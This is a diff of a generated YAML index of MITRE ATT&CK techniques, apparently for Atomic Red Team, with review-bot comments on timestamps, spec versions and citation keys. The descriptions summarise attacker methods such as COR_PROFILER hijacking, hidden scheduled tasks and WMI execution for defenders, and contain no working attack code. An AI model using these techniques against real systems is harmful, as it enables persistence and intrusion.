Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
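Review bot: `modified` for T1574.012 regresses from `'2022-04-25T14:00:00.188Z'` to `'2021-08-30T21:35:12.049Z'`, roughly eight months earlier, while the surrounding citation lines are unchanged context; same concern as the other reverted timestamps in this diff, confirm the value against the upstream object before merging.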
@@ -24480,30 +24798,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
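Review bot: for T1574.012 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing in this hunk re-adds the latter, unlike the other objects in this diff, which keep or bump `x_mitre_attack_spec_version` (T1078.003 goes to 3.2.0); check that the field is re-emitted elsewhere in the object, otherwise T1574.012 becomes the one technique here without an ATT&CK spec version. The T1053.005 description change in the same hunk is upstream text; for anyone building detections from it, the `PS_ScheduledTask` class it names lives in the `root/Microsoft/Windows/TaskScheduler` namespace and the "XML path" is its `RegisterByXml` method, which is the call to look for.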
@@ -24550,7 +24867,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24582,8 +24899,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24597,6 +24914,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
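Review bot: the new `Red Canary - Atomic Red Team` reference points at `blob/master/atomics/T1053.005/T1053.005.md`, an unpinned branch URL inside the very repository this index is generated for, so the citation is circular and will drift as that markdown changes. Upstream chose it, but the commit message should state that this is an upstream citation rather than an independent source, and a commit-pinned URL would at least be stable.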
@@ -24609,16 +24930,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
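Review bot: the new reference uses the bare `source_name: Stack Overflow`, which will collide if any other technique in this file cites a different Stack Overflow post under the same key, since `(Citation: ...)` markers resolve by exact `source_name`; upstream owns the name, so just confirm it is unique in the generated file. The `spec_version` removal and the T1047 `modified` bump in the same hunk follow the file-wide pattern.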
@@ -24684,7 +25008,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24761,66 +25084,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
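Review bot: this hunk deletes the entire field block for T1059.007 (`x_mitre_platforms` through the last `external_references` entry) and the following hunk re-adds the same content in a different key order, so the removal is churn rather than a content change; the only substantive edits are the `modified` bump here and, in the next hunk, the dropped `x_mitre_permissions_required`. Note also that `source_name: JScrip May 2018` is a typo carried from upstream; do not correct it locally, because `(Citation: ...)` markers in descriptions resolve by the exact string.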
@@ -24833,31 +25101,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
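Review bot: `source_name: JScrip May 2018` reads like a typo for "JScript", but `source_name` values are citation keys that the technique description's `(Citation: ...)` markers must match verbatim (compare `(Citation: Launchctl Man)` in the T1569.001 description later in this diff against its `source_name: Launchctl Man`), so correcting the spelling here on its own would break the reference. Either leave it as the upstream ATT&CK data has it or change the key and the description marker together.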
@@ -24915,9 +25235,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
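Review bot: `spec_version: '2.1'` is dropped from this entry with nothing replacing it, and the same removal repeats for every technique in this diff; the `x_mitre_attack_spec_version: 3.2.0` bump on the line above is a different field (the ATT&CK data spec, not the STIX spec version). If the generator now intentionally omits the STIX `spec_version`, state that in the commit message and confirm nothing downstream reads the key.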
@@ -25009,20 +25328,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -25050,7 +25368,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -25070,33 +25388,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25113,6 +25411,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -25123,9 +25422,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -25133,8 +25436,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
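Review bot: the block removed at the top of T1053.003 (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is re-added here and in the two preceding hunks with the keys in a different order, so most of the diff for this entry is a key reorder rather than a content change; the substantive changes are `x_mitre_deprecated: false`, `x_mitre_remote_support: false`, `revoked: false`, `x_mitre_version` 1.1 to 1.2 and the attack spec version 2.1.0 to 3.2.0. Emitting keys in a stable order from the generator would keep future diffs reviewable, and the commit message should say that the reorder is cosmetic.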
@@ -25174,7 +25493,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
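Review bot: `modified` for T1559.001 goes backwards here, from `2022-04-25T14:00:00.188Z` to `2021-07-26T22:51:20.448Z`; a regenerated index should not produce an older timestamp than the previous run unless the source STIX object itself was replaced. Check which ATT&CK bundle this entry was generated from before merging.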
@@ -25199,12 +25518,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
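Review bot: T1559.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place, and the hunk headers show no other change to this entry apart from the `modified` line, so after this commit it is the one technique in the diff without an `x_mitre_attack_spec_version` key while every other entry keeps or gains one. Together with the `modified` regression in the previous hunk this looks like the entry was sourced from a stale object; it should either carry the 3.2.0 value or be checked against the bundle.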
@@ -25284,11 +25601,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25348,12 +25664,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25451,9 +25766,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25470,19 +25785,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25491,7 +25805,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25528,11 +25842,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25569,11 +25882,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
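Review bot: the platform list for T1059.009 swaps `Azure AD`, `Office 365` and `Google Workspace` for `Office Suite` and `Identity Provider` (the same rename appears again for T1059 below), so any per-platform index, filter or test selector still keyed on the old names will silently stop matching these techniques. Make sure consumers of `x_mitre_platforms` are updated in the same change, or call out the rename in the commit message.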
@@ -25592,13 +25904,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25677,12 +25988,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
